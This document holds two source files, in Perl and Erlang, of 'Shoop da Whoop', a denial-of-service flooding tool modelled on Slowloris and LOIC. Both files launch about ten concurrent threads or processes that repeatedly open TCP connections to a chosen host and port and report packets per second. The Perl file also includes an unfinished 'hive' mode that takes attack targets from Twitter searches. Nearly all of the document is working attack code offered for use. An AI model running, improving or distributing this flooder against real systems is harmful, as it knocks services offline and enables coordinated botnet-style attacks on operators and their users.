File: shoop.pl
#!/usr/bin/env perl
#
# Shoop da Whoop
# Andrew Pennebaker
#
# Based on Slowloris and LOIC
# http://ha.ckers.org/slowloris/
# https://github.com/NewEraCracker/LOIC

use strict;
use warnings;

use threads;
use threads::shared;
use Term::ReadKey qw(ReadMode);
use IO::Socket::INET;
use Socket qw(IPPROTO_TCP TCP_NODELAY);
use Number::Format;
use Getopt::Long;

require POSIX unless $^O !~/linux|darwin/;

# Curses::UI and Term::Screen fail to compile for ActiveState Perl
use Games::Roguelike::Console;

sub usage {
  print "Usage: $0 [host[:port]]\n\n";

  print "Port defaults to 80.\n";
  print "If no host is provided, the hive will be polled.\n\n";

  print "--delay -d sec\tPause between floods\n";
  print "--auto -a [sec]\tPoll hive with optional delay\n";
  print "--tcp -t\tTCP SYN/ACK flood (default)\n";
  print "--udp -u\tUDP flood\n";
  print "--get -g\tGET flood\n";
  print "--post -p\tPOST flood\n";
  print "--block -b\tDo not wait for reply\n";
  print "--help -h\tUsage information\n";

  exit 1;
}

$SIG{PIPE} = 'IGNORE';          # ignore broken pipes

srand;

our $con;

our $HIVE_QUERY = "http://search.twitter.com/search.atom?q=loic";
our $TCP_TIMEOUT = 9001;        # sec
our $MAX_THREADS = 10;
our $PACKETS :shared = 0;
our $FORMATTER = new Number::Format;

our $tcp = 1;
our $udp = 0;
our $get = 0;
our $post = 0;
our $delay = 0;                 # sec
our $poll = 600;                # sec
our $host = "";
our $port = 80;
our $block = 0;

my $result = GetOptions(
                        "tcp|t" => \$tcp,
                        "udp|u" => \$udp,
                        "get|g" => \$get,
                        "post|p" => \$post,
                        "delay|d=i" => \$delay,
                        "auto|a:i" => sub { $poll = shift @_ or 600000; }, # ms
                        "block|b" => \$block,
                        "help|h" => \&usage,
                        "<>" => sub {
                          my @parts = split(/:/, shift @_);

                          $host = shift @parts;

                          if ($#parts == 0) {
                            $port = shift @parts;
                            usage unless $port > 0 && $port < 65536;
                          }
                        }
                       );

usage unless $result;

usage unless ($host ne "" && $port); # until hive functionality is added

our $alive :shared = 1;

sub flood {
  my $sock;

  while ($alive) {
    if (!defined $sock || !$sock) {
      $sock = new IO::Socket::INET(
                                   PeerAddr => $host,
                                   PeerPort => $port,
                                   Timeout => $TCP_TIMEOUT,
                                   Proto => "tcp",
                                   Blocking => $block
                                  );
    }

    if ($sock) {
      my $payload="";

      if ($tcp) {
        setsockopt $sock, IPPROTO_TCP, TCP_NODELAY, 1;
        $payload = map { chr(65 + rand(26)) } 0..6;
      }

      print $sock $payload;

      if ($SIG{__WARN__}) {
        close $sock;
      } else {
        if ($tcp) {
          $PACKETS += 4;
        } else {
          $PACKETS++;
        }
      }
    }

    sleep $delay;
  }
}

# Games::Rogulelike and Curses do not quit properly.
sub restore_console {
  $alive = 0;

  if (defined $con) {
    undef $con;
  }

  # Allow terminal echo
  if ($^O =~ /linux|darwin/) {
    my $tty = POSIX::ttyname(1);

    # Restore POSIX terminal
    #
    # icanon handles special characters
    # echo displays typed keys
    # iutf8 allows history
    #
    if ($^O =~ /darwin/) {
      system "stty -f $tty icanon echo iutf8";
    } else {
      system "stty -F $tty icanon echo iutf8";
    }

    # Show the cursor
    print "\e[?25h";
  }

  exit 0;
}

# In case $con is undefined
sub safe_addstr {
  my $x = shift @_;
  my $y = shift @_;
  my $str = shift @_;

  if (defined $con) {
    $con->addstr($x, $y, $str);
  }
}

# In case $con is undefined
sub safe_refresh {
  if (defined $con) {
    $con->refresh;
  }
}

sub blargh {
  my $m = "BLAAAAAAAAAARGH!";

  $m = shift @_ unless ($#_ != 0);

  safe_addstr(2, 2, uc($m));
  safe_refresh;

  #print $m . "\n"; # debugging
}

sub shoop {
  # Console::ANSI works better for *nix
  if ($^O =~ /linux|darwin/) {
    $con = Games::Roguelike::Console::ANSI->new;
  } else {
    $con = Games::Roguelike::Console->new;
  }

  # Force hide the cursor for *nix
  print "\e[?25l" unless ($^O !~ /linux|darwin/);

  my $width = $con->{winx};
  
  my $filler = "~" x ($width - 3);

  # Console overwrites signal handlers.
  $SIG{INT} = \&restore_console;

  safe_addstr(0, 1, "O");
  safe_addstr(0, 2, "_");
  safe_addstr(0, 3, "o");
  safe_addstr(1, 1, "/");
  safe_addstr(2, 0, "|");
  safe_addstr(3, 1, "\\_");
  blargh "IMMA\' FIRIN\' MAH LAZER!";
  safe_addstr(5, 0, "Press Control+C to quit.");
  safe_refresh;

  my $startt = time;

  map { my $t = threads->create(\&flood); $t->detach; } 1..$MAX_THREADS;

  my $interval = 0;

  my $pps = 0;

  # Prevent division by zero in pps calculation.
  while ($alive && $interval < 1) {
    $interval = time - $startt;
  }

  safe_addstr(1, 3, $filler);
  blargh " " x ($width - 3);
  safe_addstr(3, 3, $filler);
  safe_refresh;

  while ($alive) {
    $interval = time - $startt;

    $pps = $FORMATTER->format_number(int($PACKETS / $interval));
    blargh "SENDING $pps PACKETS/SEC";
  }
}

shoop;

File: shoop.erl
-module(shoop).
-author("andrew.pennebaker@gmail.com").
-export([report/1, nudge/3, shoop/2, poll/3, main/1]).
-import(getopt, [usage/2, parse/2]).
-import(escript, [script_name/0]).
-import(lists, [map/2, nth/2, member/2, append/2, keyfind/3, keymerge/3, seq/2]).
-import(gen_tcp, [connect/4, close/1]).
-import(random, [seed/3, uniform/1]).
-import(string, [to_integer/1]).
-import(timer, [now_diff/2]).
-import(re, [split/2]).

report(Packets) ->
  receive
    {packets, P} -> report(Packets + P);
    {report, Interval} ->
      io:format("Sending ~w packets/sec.~n", [round(Packets / Interval)]),
      report(Packets)
  end.

nudge(Reporter, Start, Delay) ->
  receive
  after Delay ->
      Interval = now_diff(now(), Start) / 1000000, % sec
      Reporter ! {report, Interval},
      nudge(Reporter, Start, Delay)
  end.

shoop(Settings, Reporter) ->
  case element(2, keyfind(status, 1, Settings)) of
    polling -> true;
    attack ->
      case element(2, keyfind(method, 1, Settings)) of
        "tcp" ->
          case connect(
                 element(2, keyfind(host, 1, Settings)),
                 element(2, keyfind(port, 1, Settings)),
                 [{nodelay, true}],
                 element(2, keyfind(timeout, 1, Settings))
                ) of
            {ok, Socket} ->
              close(Socket),
              Reporter ! {packets, 4};
            {error, Error} ->
              Error
          end;
        "udp" ->
                                                % ...
          Reporter ! {packets, 1};
        "http" ->
                                                % ...
          Reporter ! {packets, 8}
      end
  end,

  receive {order, Orders} ->
      shoop(keymerge(1, Orders, Settings), Reporter)
  after element(2, keyfind(delay, 1, Settings)) ->
      shoop(Settings, Reporter)
  end.

poll(Lazers, Hive, Delay) ->
  receive
  after Delay ->
      io:format("Polling hive...~n"),
      map(fun(L) -> L ! {order, [{status, attack}, {host, "localhost"}, {port, 80}, {method, "tcp"}]} end, Lazers),
      poll(Lazers, Hive, Delay)
  end.

option_spec() ->
  [
   %% {Name, ShortOpt, LongOpt, ArgSpec, HelpMsg}
   {delay, $d, "delay", integer, "Pause between floods (ms)"},
   {method, $m, "method", string, "Attack method (tcp, udp, or http)"},
   {timeout, $t, "timeout", integer, "Lazer timeout (ms)"},
   {help, $h, "help", undefined, "Display usage information"},
   {target, undefined, undefined, string, "Target. Will poll hive if not specified."}
  ].

u() -> usage(option_spec(), script_name()).

split_address(Address) -> [A | B] = split(Address, ":"), split_address(A, B).

split_address(H, []) -> [{host, binary_to_list(H)}, {port, 80}];

split_address(H, Rest) ->
  Host = binary_to_list(H),

  [P | _] = Rest,

  Port = case P of
           [] -> 80;
           X -> case to_integer(binary_to_list(X)) of
                  {error, _} -> 80;
                  {X2, _} -> if
                               (X2 > 0) and (X2 < 65536) -> X2;
                               true -> 80
                             end
                end
         end,

  [{host, Host}, {port, Port}].

main(Args) ->
  {A1, A2, A3} = now(),
  seed(A1, A2, A3),

  case parse(option_spec(), Args) of
    {error, _} -> u();

    {ok, {Options, _}} ->
      case member(help, Options) of
        true -> u();
        _ ->
          {Host, Port, Poll} = case keyfind(target, 1, Options) of
                                 {target, Address} -> list_to_tuple(append(split_address(Address), [{status, attack}]));
                                 _ -> {{host, "localhost"}, {port, 80}, {status, polling}}
                               end,

          Delay = case keyfind(delay, 1, Options) of
                    false -> {delay, 0};
                    X -> X
                  end,

          Timeout = case keyfind(timeout, 1, Options) of
                      false -> {timeout, 9001};
                      Y -> Y
                    end,

          Method = case keyfind(method, 1, Options) of
                     false -> {method, "tcp"};
                     Z -> Z
                   end,

          Settings = [Host, Port, Poll, Delay, Timeout, Method],

          Rep = spawn(shoop, report, [0]),

          Laz = map(fun(_) -> spawn(shoop, shoop, [Settings, Rep]) end, seq(1, 10)),

          nudge(Rep, now(), 1000),

          case Poll of
            {status, polling} ->
              u(), % until polling is implemented
              spawn(shoop, poll, [Laz, "http://search.twitter.com/search?q=loic+target", 5000]);
            _ -> true
          end
      end
  end.
